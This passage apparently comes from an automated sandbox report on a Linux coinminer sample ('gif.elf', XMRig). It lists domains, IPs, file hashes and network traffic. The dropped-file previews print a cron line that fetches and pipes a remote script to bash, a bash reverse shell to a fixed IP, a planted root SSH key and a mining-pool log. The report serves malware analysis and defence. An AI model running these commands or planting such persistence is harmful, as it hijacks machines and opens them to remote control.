        /tmp/.miner83%ReversingLabsLinux.Coinminer.Generic
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://z.shavsl.com/b0%Avira URL Cloudsafe
        http://w.softprojectcode.com/%s0%Avira URL Cloudsafe
        http://w.softprojectcode.com/miner0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.25
        truefalse
          high
          o.softgoldinformation.com
          176.32.39.18
          truetrue
            unknown
            o4.softgoldinformation.com
            176.32.39.18
            truetrue
              unknown
              w.softprojectcode.com
              107.167.34.74
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://w.softprojectcode.com/minerfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://z.shavsl.com/bgif.elf, watch.48.dr, watch.50.drfalse
                • Avira URL Cloud: safe
                unknown
                http://upx.sf.net.miner.94.drfalse
                  high
                  http://w.softprojectcode.com/%sgif.elffalse
                  • Avira URL Cloud: safe
                  unknown
                  https://xmrig.com/wizardsh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpfalse
                    high
                    https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_issh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpfalse
                      high
                      https://gcc.gnu.org/bugssh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpfalse
                        high
                        https://xmrig.com/wizard%ssh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpfalse
                          high
                          https://xmrig.com/docs/algorithmssh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            107.167.34.74
                            w.softprojectcode.comUnited States
                            8100ASN-QUADRANET-GLOBALUSfalse
                            176.32.39.18
                            o.softgoldinformation.comRussian Federation
                            51659ASBAXETRUtrue
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            107.167.34.74gif.elfGet hashmaliciousXmrigBrowse
                            • w.softprojectcode.com/miner
                            176.32.39.18gif.elfGet hashmaliciousXmrigBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              o4.softgoldinformation.comgif.elfGet hashmaliciousXmrigBrowse
                              • 176.32.39.18
                              SecuriteInfo.com.PUA.Tool.Linux.BtcMine.4274.18395.31150.elfGet hashmaliciousXmrigBrowse
                              • 46.17.41.146
                              daisy.ubuntu.comnklarm6.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.24
                              arm6.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              nabarm6.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              6j272sSkTN.elfGet hashmaliciousFogBrowse
                              • 162.213.35.24
                              debug.dbg.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.24
                              arm7.elfGet hashmaliciousMirai, MoobotBrowse
                              • 162.213.35.25
                              a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 162.213.35.24
                              i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 162.213.35.24
                              x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 162.213.35.24
                              m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 162.213.35.24
                              o.softgoldinformation.comgif.elfGet hashmaliciousXmrigBrowse
                              • 176.32.39.18
                              SecuriteInfo.com.PUA.Tool.Linux.BtcMine.4274.18395.31150.elfGet hashmaliciousXmrigBrowse
                              • 46.17.41.146
                              Tk4NDwJq1L.elfGet hashmaliciousXmrigBrowse
                              • 91.149.239.186
                              w.softprojectcode.comgif.elfGet hashmaliciousUnknownBrowse
                              • 192.186.12.50
                              gif.elfGet hashmaliciousXmrigBrowse
                              • 107.167.34.74
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ASN-QUADRANET-GLOBALUSapep.spc.elfGet hashmaliciousUnknownBrowse
                              • 104.247.172.135
                              gif.elfGet hashmaliciousXmrigBrowse
                              • 107.167.34.74
                              https://www.google.com/url?q=https%3A%2F%2Fpoizonus.com%2Fsu&sa=D&sntz=1&usg=AOvVaw1vivNuhukc7YPqnTjOKT1g&af6pbi8nqbgwu55cw518lklmc8rlvoy3529npBRmIAzUEe9djvzki8kdrm19expwx==fFx66xNbaFwp2wAuYMKsTBscURqb78mwqYpIp~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~p0FmCojG8ZOE3336PK8YJ7SAxYr==X2K3pHjUpcsHSSJsm15nFJNZBrB3eBocYRdGet hashmaliciousUnknownBrowse
                              • 104.245.240.188
                              https://www.google.com/url?q=https%3A%2F%2Fpoizonus.com%2Fsu&sa=D&sntz=1&usg=AOvVaw1vivNuhukc7YPqnTjOKT1g&af6pbi8nqbgwu55cw518lklmc8rlvoy3529npBRmIAzUEe9djvzki8kdrm19expwx==fFx66xNbaFwp2wAuYMKsTBscURqb78mwqYpIp~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~p0FmCojG8ZOE3336PK8YJ7SAxYr==X2K3pHjUpcsHSSJsm15nFJNZBrB3eBocYRdGet hashmaliciousHTMLPhisherBrowse
                              • 104.245.240.188
                              XTN1VzRJZm.exeGet hashmaliciousUnknownBrowse
                              • 204.44.192.90
                              XTN1VzRJZm.exeGet hashmaliciousUnknownBrowse
                              • 204.44.192.90
                              GGP_DOCUMENTO CITACION AUDIENCIA_GGP.svgGet hashmaliciousAsyncRAT, DcRatBrowse
                              • 104.245.240.63
                              i686.elfGet hashmaliciousMiraiBrowse
                              • 156.232.79.44
                              cbr.spc.elfGet hashmaliciousMiraiBrowse
                              • 46.30.191.209
                              BBVA-P53269 .pdf.exeGet hashmaliciousUnknownBrowse
                              • 204.44.192.90
                              ASBAXETRUgif.elfGet hashmaliciousXmrigBrowse
                              • 176.32.39.18
                              mips.elfGet hashmaliciousMiraiBrowse
                              • 176.32.32.113
                              ppc.elfGet hashmaliciousMiraiBrowse
                              • 176.32.32.113
                              nshkmpsl.elfGet hashmaliciousMiraiBrowse
                              • 176.32.32.113
                              UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                              • 176.32.38.130
                              quotation.exeGet hashmaliciousFormBookBrowse
                              • 176.32.38.130
                              ppc.elfGet hashmaliciousUnknownBrowse
                              • 45.147.200.148
                              hmips.elfGet hashmaliciousUnknownBrowse
                              • 45.147.200.148
                              arm4.elfGet hashmaliciousUnknownBrowse
                              • 45.140.169.21
                              mips.elfGet hashmaliciousUnknownBrowse
                              • 176.32.39.112
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              /tmp/.minergif.elfGet hashmaliciousXmrigBrowse
                                Tk4NDwJq1L.elfGet hashmaliciousXmrigBrowse
                                  Process:/bin/sh
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):57
                                  Entropy (8bit):4.384064175252616
                                  Encrypted:false
                                  SSDEEP:3:9991KexA/FN3HLWUPGHFppkev:6exA/33HLDGnpkev
                                  MD5:6A0F0DC196D42B180C24DA7A372FCF05
                                  SHA1:3189560C64D1CE9030647A477C2B2C8CA180B937
                                  SHA-256:AA6124CA198DA79C50B97D98868F6769126DBB2F0CCAD0B0F85B6E1F2E903D95
                                  SHA-512:AF352C95566447CD1798A1C697AAE73920AA95F1E8AC6A48D61603EA2C2588E7440B111908A6D72C89744425C45066541871483D21A0D11434500EBB6A60560B
                                  Malicious:true
                                  Reputation:low
                                  Preview:0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash .
                                  Process:/bin/sh
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):43
                                  Entropy (8bit):4.489877254551158
                                  Encrypted:false
                                  SSDEEP:3:lyMva6VK1XefLWUKT1:lfva6VK1Xee1
                                  MD5:F77E954ADACCF91A9A0CADE858336A4D
                                  SHA1:76073B74710DC6291EC882FBE771F1B38803E524
                                  SHA-256:D9D607BE4896C4EFD967BC034666A3907F3EF12DE9BECF91733DCF0EBE417CA2
                                  SHA-512:58D2B48D9EB8AFE9D50EC08B73DE4AEA57288194675739B5EDF6961EE5B999876B5938E11CCE9747E3689CF3E559AD9A62A7642E6EC24514145FEA953AD68E98
                                  Malicious:true
                                  Reputation:low
                                  Preview:bash -i >& /dev/tcp/45.125.66.31/8443 0>&1.
                                  Process:/tmp/.miner
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):223
                                  Entropy (8bit):4.688510687027742
                                  Encrypted:false
                                  SSDEEP:3:OS8K9ck4geFvvBEeLqU3KDMF4GE0g7a3F2k/FUEJzxyEIGEWX/7J+TVIJJaQTv:OSR54geFvbLq/DMFPgkDygzAQEW1c2bj
                                  MD5:E5172D7724A945AC21A186A91FCEA08B
                                  SHA1:B6C7D1A673D3D08B75505A281225D9EF2777EDEA
                                  SHA-256:334D8B69DDEC2FEC20FEF9537654F66BB02E9458AA89DF7B234F37D384FECE2A
                                  SHA-512:882FB0863B5AE49ED4D3A16E7966951226C4338064662E24490F0ED2C6B469378FC09F221CF3C8A15E2A9400E23CACCBE27BA8FFB48A62BC255136C967FB557D
                                  Malicious:false
                                  Reputation:low
                                  Preview:127.0.0.1 localhost.127.0.1.1 galassia..# The following lines are desirable for IPv6 capable hosts.::1 ip6-localhost ip6-loopback.fe00::0 ip6-localnet.ff00::0 ip6-mcastprefix.ff02::1 ip6-allnodes.ff02::2 ip6-allrouters.
                                  Process:/tmp/gif.elf
                                  File Type:OpenSSH RSA public key
                                  Category:dropped
                                  Size (bytes):391
                                  Entropy (8bit):5.890545217406209
                                  Encrypted:false
                                  SSDEEP:6:2k0cAvgmfpQ5T26U5n4gQLgZ3AxgyxOYwFQhymEpgXkB/js0X+wJmMnYYj:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYj
                                  MD5:4968B16E23E6854F827539320EFDC6B3
                                  SHA1:BC6C9965E7D3651DD2E2E7798A74907D9CAD59FA
                                  SHA-256:E9E25CC3FD9285DA9E195BA601D76BA65DE6209487F0DA3B45F76FD31EFC44E1
                                  SHA-512:1CAF31C290C4F0EED7BCA6AD264F0C7D870104B75921410213F26348B0AFB22E9460045419FBD4613A32BBDD503E2608BB063B02F2117A454DCB3500355F09B7
                                  Malicious:true
                                  Reputation:low
                                  Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
                                  Process:/tmp/gif.elf
                                  File Type:OpenSSH RSA public key
                                  Category:dropped
                                  Size (bytes):782
                                  Entropy (8bit):5.890545217406209
                                  Encrypted:false
                                  SSDEEP:12:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYAFcWnpiH0VQLYAxhwY5hPQw2bsQdnYYj:R5pb/gNdSm5pb/gNdt
                                  MD5:9FA4780AFF535CC3ABFC28270A3DBAF5
                                  SHA1:202CB6C134B01506FA8B2E590A1700A8D3400A4F
                                  SHA-256:F4DD2F81E119FFC0C202DECFB28810154C607B6F1FBCA2021D4A9CB399CBA4BB
                                  SHA-512:1C6B6931589906DABC0CBE27B790CA23BAEADCA0BAA2D22B1D4CE8B4D98F5D01806A5A9B620908012B2057199B5C5C8B96C7B95A4E2EC0F0E963E4F7A43FA23B
                                  Malicious:true
                                  Reputation:low
                                  Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
                                  Process:/tmp/.miner
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):16
                                  Entropy (8bit):1.311278124459133
                                  Encrypted:false
                                  SSDEEP:3:Gyt:G
                                  MD5:1A5903E1A3AD298702421404119316F7
                                  SHA1:DA3318B0C3F13C0ABB40C2CA85934C62AA0483F2
                                  SHA-256:CC9ACABBEDCB49FF90D7F0058B97A5A93B929779FE493D47249228F1B2D73C0D
                                  SHA-512:92C985F673277B40A313031374E4CB2F454FD97F2B8689CB5C2E437F991DBF6E82C81566A655732B202C70BC2D4CDCE107CF6802DB24065043CBAF22AE23685A
                                  Malicious:false
                                  Preview:5634............
                                  Process:/tmp/.miner
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1133
                                  Entropy (8bit):5.045808085824394
                                  Encrypted:false
                                  SSDEEP:24:20y97VHaMfVwqUV8fmqU0kyJ9zD5zLouwfzXguVFzXgutszXguLzXguOLzXb:hy95HaUNM8Q89Bfou2cuzcutscuLcuOz
                                  MD5:FD9EFD82AFD03F1A433BF490148BCF2C
                                  SHA1:2FF2C669129BDEEC0AF1113E1413321EE1CD0691
                                  SHA-256:3A645C6F67B5F154A528836B9D9955861A71A7C5F1075F9ED5DA7E1006ED465D
                                  SHA-512:F12A49F9E644014768D49A3AF4032F0BFBB6AB616EE2B331C487B995C63087D4E8E8E1896F7AB68743190C3C942C813152103B8C9D1164B385A9E8226F7827C3
                                  Malicious:false
                                  Preview: * ABOUT XMRig/6.18.0 gcc/11.2.0. * LIBS libuv/1.42.1-dev OpenSSL/1.1.1l hwloc/2.6.0a1-git. * HUGE PAGES supported. * 1GB PAGES disabled. * CPU Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz (2) 64-bit AES VM. L2:2.0 MB L3:27.5 MB 2C/2T NUMA:1. * MEMORY 2.1/2.9 GB (70%). RAM slot #0: 2 GB DRAM @ 0 MHz RAM slot #0. RAM slot #1: 1 GB DRAM @ 0 MHz RAM slot #1. * MOTHERBOARD VMware, Inc. - VMware Virtual Platform. * DONATE 0%. * ASSEMBLY auto:intel. * POOL #1 o4.softgoldinformation.com:3334 algo cn-heavy/xhv. * COMMANDS hashrate, pause, resume, results, connection.[2025-03-09 20:52:39.847] net o4.softgoldinformation.com:3334 read error: "end of file".[2025-03-09 20:52:47.421] net o4.softgoldinformation.com:3334 read error: "end of file".[2025-03-09 20:52:54.422] net o4.softgoldinformation.com:3334 read error: "end of file".[2025-03-09 20:53:01.455] net o4.softgoldinformat
                                  Process:/usr/bin/curl
                                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
                                  Category:dropped
                                  Size (bytes):1827416
                                  Entropy (8bit):7.999874924436921
                                  Encrypted:true
                                  SSDEEP:49152:njEflQ/573nydbeONLwFCRTrgcSzNpZWPU6B:jEflQRTydb/ZwGrwzNpCB
                                  MD5:44DE739950EB4A8A3552B4E1987E8EC2
                                  SHA1:0AE049AAB363FB8D2E164150DFFBAFD332725E00
                                  SHA-256:9B81BAD2111312E669697B69B9F121A1F9519DA61CD5D37689E38381C1FFAD28
                                  SHA-512:92EC17D3929B16353B40B29EEFB5AD1DE26621A20DC1C065E7CD9F294A9763844FF8673730D00F1A255AD4D42E06A1FB3171822DB59DD20C639D3FF691256A7C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 83%
                                  Joe Sandbox View:
                                  • Filename: gif.elf, Detection: malicious, Browse
                                  • Filename: Tk4NDwJq1L.elf, Detection: malicious, Browse
                                  Preview:.ELF..............>.......[.....@...................@.8...@.......................@.......@....................... .............`.......`.......`......................... .....)]..UPX!L.........K...K.X...k..........?.E.h=.....N.....e..U.....bo.G...y..$...pL.:rz3......{w.......`....A..h...T.NF%..FM.%j...k.>h#r.OH..R.........(:.M.1@.......7.NJ..........m..'..>.......J.T[...[.f=.....N..O(..)v...S._....#.;dq.2.7...}.p.D..o.B."...N.Z.~}l....:..O.&..HJ........5N.QQ...>...J....t^p........etq....d......}.,...7.E..T.lm.Q"2.x.}......Xv....E......R(N...t..9D*.u"..T.1..3.=.7.F...W....fB..a.jF.y.'..R..X,.X.....r,...%.F.u.....:.5!.kPd.qQ&../.V......G.....k.b..>lq...4..l..~Jp[..{q;4.....0i..!$.jDb...&...<...a......K...S. .......*3j6Z,..Zr^qH....i..FD./.0..Ho......L..]....:V...+K........]X.../.?...0..7...[....X1.m....<$.....I..O.Fo..I..^..se..t........l.............#cL...}v...?N.gT.I..kU..g...],..O....).?2.K^I3-)\.y...a..R.]...4.\>.w..E.xb...z[.'4..1..q.E.$...g.
                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), too many section (64254)
                                  Entropy (8bit):4.084037025484754
                                  TrID:
                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                  File name:gif.elf
                                  File size:115'848 bytes
                                  MD5:ec8ec8bb794a4cb09aaf8ff893829e94
                                  SHA1:3aec40bbcc256509c94bc05ee5bc10786a1dbe66
                                  SHA256:4b5d2f096d5e4d4a0cdbddc11f8abc8b3639ff140c5a0ec750ed6b578b0f37d2
                                  SHA512:5995164dd6f71570ec80a174ac874178aeee9ab408a19143cd5126731e767d4d12941236ac0bf9176bf84eda6aa4dd82084a28f1e30e361bbb213391056d0c3c
                                  SSDEEP:768:mpkuDMkSkgP+kth8kJzAmyhwhmRCh+oKhAg0gNuUfQHsC/0e3CYi323ErC1:mr+PbWCQCh+pAgwUfGsCsm632Ur
                                  TLSH:78B35B43F0504CFAE895C9B807AB8525F6E3B0E51218376A33CCFA70671BF957619BA1
                                  File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@.....$.......$......... .......................a.......a.....(.......P......... .....Q.td....................................................R.td..............a....
                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 10, 2025 02:52:35.351311922 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.356985092 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.357040882 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.357093096 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.362577915 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.941335917 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.941472054 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.941559076 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.941679001 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.942024946 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.942024946 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.942341089 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.942358017 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.942408085 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.942408085 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.943773031 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.943797112 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.943820953 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.943830013 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.943830013 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.943857908 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.945313931 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.945331097 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.945358038 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.945358038 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.946599007 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.946644068 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.946877003 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.946959019 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.947475910 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.947515965 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.948012114 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.948028088 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:35.948060036 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:35.948060036 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.031275988 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.031356096 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.031584978 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.031603098 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.032697916 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.032715082 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.033602953 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.033618927 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.034071922 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.034720898 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.034738064 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.035958052 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.035974979 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.036626101 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.037132025 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.037152052 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.038393021 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.038414001 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.038433075 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.038768053 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.039566994 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.039582968 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.040519953 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.040537119 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042417049 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042433977 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042465925 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042481899 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042498112 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.042927980 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.121285915 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.121572971 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.121588945 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.121633053 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.121633053 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.122631073 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.122649908 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.122669935 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.122682095 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.123662949 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.123678923 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.123694897 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.123708010 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.123708010 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.123720884 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.124766111 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.124783039 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.124866009 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.124866009 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.125884056 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.125900030 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.125938892 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.125938892 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.127072096 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.127089977 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.127124071 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.127124071 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.128169060 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.128186941 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.128220081 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.128220081 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.129318953 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.129337072 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.129352093 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.129379034 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.129379034 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.129379034 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.130270004 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.130285978 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.130305052 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.130305052 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.131175995 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.131192923 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.131220102 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.131220102 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.132038116 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.132055044 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.132078886 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.132088900 CET4685080192.168.2.13107.167.34.74
                                  Mar 10, 2025 02:52:36.132951021 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.132968903 CET8046850107.167.34.74192.168.2.13
                                  Mar 10, 2025 02:52:36.132982969 CET8046850107.167.34.74192.168.2.13
